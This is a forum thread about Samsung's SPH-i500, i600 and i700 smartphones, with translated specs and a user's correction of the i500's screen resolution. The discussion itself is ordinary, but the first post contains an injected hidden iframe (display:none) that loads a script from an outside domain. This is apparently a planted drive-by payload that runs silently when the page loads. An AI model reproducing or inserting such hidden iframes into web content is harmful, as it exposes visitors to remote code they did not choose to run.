Samsung's smartphone lineup...
It's been shown on this forum as well as some other
sites before, but here's a link to one page that has
great pictures of i500, i600, and i700.
http://www.pdabench.com/review7/MIT/MIT.htm
Enjoy...
Personally, I would like an i500 but with GSM/GPRS
running Palm OS 5, with an SD slot, a rotating camera
in the hinge...<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

From that referred page.
o. SPH-I500 (BlueChip)
- PalmOS
- Designed to integrate Yamaha's sound module with 40 polyphony, but nothing is known about the actual spec.
- 320x320 LCD
- Has a "Back" button a la Clie.
o. SPH-I600
- Microsoft SmartPhone 2002
- Has an SD slot
- No touch input on the display (due to the SmartPhone spec).
o. SPH-I700
- Microsoft PocketPC Phone Edition
- Uses an XScale and has a camera.
- Has an SD/MMC slot.

Any indications of availability? I bet they're already selling those in Japan...they're always a few steps ahead when it comes to consumer electronics. That I700 looks really cool, i wish I had one.

It's a Korean company. And no, there was no indication of the availability. It actually said the three new smartphones (I500, I600, and I700) are made for the U.S. market and the writer was hoping that Samsung will eventually bring them into the Korean market (just as I300 vs. M330).

i500, also called Bluechip, DOES NOT have 320x320 display.
It is your basic 160x160 LCD with a couple of more pixels
for border, and a 15 or so pixel high indicator bar on top
for phone related icons, similar to i330.
For size comparison, the LCD of the i500 is almost the same
width as the i330/i300 LCD. So you can imagine what the
size is, and squeeze 320x320 in that space? Not yet...

I understand, rave. This was totally new to me. But I was just translating what was written on that page in Korean.
It would be extremely nice if it were true, but if it's the mistake of the writer, I guess I won't get heart broken.
EDIT: Okay, from Samsung's site, it is confirmed that the resolution is indeed 162x176 (160x160 with the top line and some border).
